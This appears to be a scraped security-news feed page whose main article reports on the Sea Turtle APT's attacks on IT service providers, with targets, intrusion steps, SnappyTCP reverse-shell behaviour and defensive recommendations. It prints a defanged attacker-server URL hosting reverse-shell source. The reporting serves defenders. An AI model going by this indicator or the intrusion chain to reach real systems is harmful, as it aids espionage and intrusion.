A Brazilian threat actor is targeting more than 30 Portuguese financial institutions with information-stealing malware as part of a long-running campaign that commenced in 2021.
“The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain,” SentinelOne researchers Aleksandar Milenkoski and Tom Read More
Related Posts
IMF Emails Hacked
IMF Emails Hacked
[[{“value”:”
The International Monetary Fund (IMF) detects a cybersecurity incident that involved nearly a dozen email accounts getting hacked.
The post IMF Emails Hacked appeared first on SecurityWeek.
“}]] Read More
SecurityWeek RSS Feed
Sea Turtle APT Group Exploiting Known Vulnerabilities to Attack IT-service Providers
Sea Turtle APT Group Exploiting Known Vulnerabilities to Attack IT-service Providers
To obtain access to a variety of clients’ systems and data in a single attack, hackers frequently target IT service providers.
Their strategy lets them maximize the effect of their efforts by allowing them to compromise several organizations from a single point of entry.
Cybersecurity security researchers at Hunt & Hackett recently discovered that the Turkish espionage APT group Sea Turtle has been actively exploiting the known vulnerabilities to attack IT service providers.
Document
Free Webinar
Fastrack Compliance: The Path to ZERO-Vulnerability
Compounding the problem are zero-day vulnerabilities like the MOVEit SQLi, Zimbra XSS, and 300+ such vulnerabilities that get discovered each month. Delays in fixing these vulnerabilities lead to compliance issues, these delay can be minimized with a unique feature on AppTrana that helps you to get “Zero vulnerability report” within 72 hours.
Sea Turtle APT Group
Sea Turtle APT group has been active since 2017 and is known for DNS hijacking; it adapts to evade detection.
Evading detection, Microsoft exposed SILICON in Oct 2021, aligning with Turkish interests. Not only that, even in 2022, the Greek National CERT shared the IOCs.
For sensitive data, Sea Turtle targets the following areas:-
Europe
Middle East
North Africa
Here below, we have mentioned all the sectors and entities targeted:-
Gov’t bodies
Kurdish groups
NGOs
Telecom
ISPs
IT
Media
Successful attacks aid surveillance and intelligence gathering. Sea Turtle intercepts internet traffic using reverse shell for data extraction.
Researchers tracked the Sea Turtle’s campaigns also in the Netherlands and discovered that they are primarily focused on the following two key things for Turkish interests:-
Economic espionage
Political espionage
Recent campaigns in the Netherlands target the following:-
Telecom
Media
ISPs
Kurdish websites
Sea Turtle employs supply chain attacks to collect politically motivated information. Stolen data is likely used for surveillance or intelligence on specific groups.
In early 2023, Hunt & Hackett identified Sea Turtle’s latest campaigns targeting multiple organizations. In one attack, experts identified that the threat actor compromised a cPanel account and used a VPN for access.
They created a WebMail session and performed SSH logons from a hosting provider’s IP. Source code files for a ‘C’ programming language reverse shell were downloaded and compiled from a known Sea Turtle GitHub repository.
The PwC independently linked this to Sea Turtle using the SnappyTCP reverse shell, and here, the SnappyTCP was downloaded from a Sea Turtle server (http[://]193.34.167[.]245/c00n/connn.c).
The actor established a command-and-control channel, employed anti-forensic measures, and reconnected to the compromised cPanel account.
If specific conditions are met, the SnappyTCP malware does the following things:-
Reads a config file
Performs an HTTP GET with ‘sy.php’ request URI
Spawns a reverse shell
Meanwhile, the C&C channel likely involves Socat, which matches the characteristics found on the server.
Recommendations
Here below, we have mentioned all the recommendations provided by the cybersecurity analysts:-
Deploy EDR for monitoring network connections, processes, and account activity; store logs centrally.
Enforce a strong password policy.
Always use a secrets management system for storage.
Limit logon attempts.
Enable 2FA on external accounts.
Keep software updated to minimize vulnerabilities.
Restrict SSH access
Implement SSH logon rate limit.
Implement egress network filtering to block malicious traffic.
Try Kelltron’s cost-effective penetration testing services for free to assess and evaluate the security posture of digital systems
The post Sea Turtle APT Group Exploiting Known Vulnerabilities to Attack IT-service Providers appeared first on Cyber Security News.
Cyber Security News
CISA says Sisense hack impacts critical infrastructure orgs
CISA says Sisense hack impacts critical infrastructure orgs
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is investigating the recent breach of data analytics company Sisense, an incident that also impacted critical infrastructure organizations. […] Read More
BleepingComputer